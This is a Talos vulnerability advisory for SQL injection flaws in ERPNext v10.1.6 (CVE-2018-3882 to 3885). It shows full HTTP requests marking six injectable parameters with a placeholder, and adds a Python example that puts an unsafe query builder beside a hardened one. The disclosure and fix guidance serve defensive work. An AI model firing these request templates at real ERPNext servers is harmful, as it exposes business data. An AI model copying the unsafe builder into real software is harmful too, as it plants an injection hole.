CVE-2018-3882: TALOS-2018-0560 || Cisco Talos Intelligence Group

An exploitable SQL injection vulnerability exists in the authenticated part of ERPNext v10.1.6. Specially crafted web requests can cause SQL injections resulting in data compromise. The searchfield parameter can be used to perform an SQL injection attack. An attacker can use a browser to trigger these vulnerabilities, and no special tools are required.


Summary

Exploitable SQL injection vulnerabilities exist in the authenticated part of ERPNext v10.1.6. Specially crafted web requests can cause SQL injections resulting in data compromise. An attacker can use a browser to trigger these vulnerabilities, and no special tools are required.

Tested Versions

ERPNext v10.1.6 (master)

Product URLs

https://erpnext.com/

CVSSv3 Score

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

CWE

CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)

Details

The following parameters are vulnerable to SQL injection attacks:

CVE-2018-3882 - searchfield parameter

The searchfield parameter can be used to perform an SQL injection attack as shown below:

GET /?txt=a&searchfield=name<SQLINJECTION>&query=erpnext.controllers.queries.employee_query&doctype=Employee&cmd=frappe.desk.search.search_widget&_=1522110063950 HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Cookie: user_image=; user_id=Administrator; system_user=yes; full_name=Administrator; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=-cQWmng9Wch23ijkAAAF
DNT: 1
Connection: close

CVE-2018-3883 - employee parameter

The employee parameter can be used to perform an SQL injection attack as shown below:

POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 194
Cookie: user_image=; user_id=Administrator; system_user=yes; full_name=Administrator; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=-cQWmng9Wch23ijkAAAF
DNT: 1
Connection: close

employee=EMP%2f0001<SQLINJECTION>&date=2018-03-07&leave_type=Leave+Without+Pay&consider_all_leaves_in_the_allocation_period=true&cmd=erpnext.hr.doctype.leave_application.leave_application.get_leave_balance_on

CVE-2018-3883 - sort_order parameter

The sort_order parameter can be used to perform an SQL injection attack as shown below:

POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 113
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close

item_code=asdasd&start=0&sort_by=projected_qty&sort_order=asc<SQLINJECTION>&cmd=erpnext.stock.dashboard.item_dashboard.get_data

CVE-2018-3884 - sort_by parameter

The sort_by parameter can be used to perform an SQL injection attack as shown below:

POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 113
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close

item_code=asdasd&start=0&sort_by=projected_qty<SQLINJECTION>&sort_order=asc&cmd=erpnext.stock.dashboard.item_dashboard.get_data

CVE-2018-3884 - start parameter

The start parameter can be used to perform an SQL injection attack as shown below:

POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 113
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close

item_code=asdasd&start=0<SQLINJECTION>&sort_by=projected_qty&sort_order=asc&cmd=erpnext.stock.dashboard.item_dashboard.get_data

CVE-2018-3885 - order_by parameter

The order_by parameter can be used to perform an SQL injection attack as shown below:

GET /?start=0&page_length=20&doctype=Customer&fields=[%22%60tabCustomer%60.%60name%60%22%2c%22%60tabCustomer%60.%60owner%60%22%2c%22%60tabCustomer%60.%60docstatus%60%22%2c%22%60tabCustomer%60.%60_user_tags%60%22%2c%22%60tabCustomer%60.%60_comments%60%22%2c%22%60tabCustomer%60.%60modified%60%22%2c%22%60tabCustomer%60.%60modified_by%60%22%2c%22%60tabCustomer%60.%60_assign%60%22%2c%22%60tabCustomer%60.%60_liked_by%60%22%2c%22%60tabCustomer%60.%60_seen%60%22%2c%22%60tabCustomer%60.%60customer_name%60%22%2c%22%60tabCustomer%60.%60image%60%22%2c%22%60tabCustomer%60.%60disabled%60%22%2c%22%60tabCustomer%60.%60customer_group%60%22%2c%22%60tabCustomer%60.%60territory%60%22%2c%22%60tabCustomer%60.%60customer_type%60%22]&filters=%5B%5D&order_by=<SQLINJECTION>&with_comment_count=true&user_settings=%7B%22updated_on%22%3A%22Tue+Mar+27+2018+01%3A08%3A06+GMT%2B0100%22%2C%22List%22%3A%7B%22filters%22%3A%5B%5D%2C%22order_by%22%3A%22%60tabCustomer%60.%60modified%60+desc%22%7D%2C%22last_view%22%3A%22List%22%7D&cmd=frappe.desk.reportview.get&_=1522108874124 HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close
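The start, sort_by, sort_order and order_by parameters above share one root cause: ORDER BY columns, sort directions and OFFSET values cannot be passed to the database as bound placeholders, so code that formats them straight into the query string hands request input to the SQL parser. The example below is written for this page (it is not ERPNext's or Frappe's own code) and shows that vulnerable pattern next to a hardened builder that allowlists the identifier and direction, casts the offset to an integer and binds the item code; the table and column names are constructed for the example.

```python
import sqlite3

# Constructed allowlists for the example; a real handler would derive
# these from the DocType's field definitions rather than hard-code them.
ALLOWED_SORT_COLUMNS = {"item_code", "warehouse", "projected_qty", "actual_qty"}
ALLOWED_SORT_ORDERS = {"asc", "desc"}


def build_item_query_unsafe(item_code, start, sort_by, sort_order):
    """Vulnerable pattern: every request parameter is formatted into the SQL
    text, so start, sort_by and sort_order reach the parser verbatim."""
    return (
        "SELECT item_code, warehouse, projected_qty FROM bin "
        "WHERE item_code = '%s' ORDER BY %s %s LIMIT 20 OFFSET %s"
        % (item_code, sort_by, sort_order, start)
    )


def build_item_query_safe(item_code, start, sort_by, sort_order):
    """Hardened form: identifiers come from an allowlist, the offset is an
    int, and the only free-form value (item_code) is a bound parameter."""
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError("sort_by is not an allowed column: %r" % sort_by)
    direction = str(sort_order).lower()
    if direction not in ALLOWED_SORT_ORDERS:
        raise ValueError("sort_order must be asc or desc: %r" % sort_order)
    try:
        offset = int(start)
    except (TypeError, ValueError):
        raise ValueError("start must be an integer: %r" % start)
    if offset < 0:
        raise ValueError("start must be non-negative: %r" % start)
    sql = (
        "SELECT item_code, warehouse, projected_qty FROM bin "
        "WHERE item_code = ? ORDER BY %s %s LIMIT 20 OFFSET ?" % (sort_by, direction)
    )
    return sql, (item_code, offset)


def run_safe_query(item_code, start, sort_by, sort_order):
    """Runs the hardened query against a constructed in-memory stock table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE bin (item_code TEXT, warehouse TEXT, projected_qty REAL)")
    conn.executemany("INSERT INTO bin VALUES (?, ?, ?)", [
        ("ITEM-001", "Stores", 5.0),
        ("ITEM-001", "Work In Progress", 12.0),
        ("ITEM-002", "Stores", 1.0),
    ])
    sql, params = build_item_query_safe(item_code, start, sort_by, sort_order)
    rows = conn.execute(sql, params).fetchall()
    conn.close()
    return rows
```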

Timeline

2018-04-12 - Vendor Disclosure
2018-09-05 - Public Release
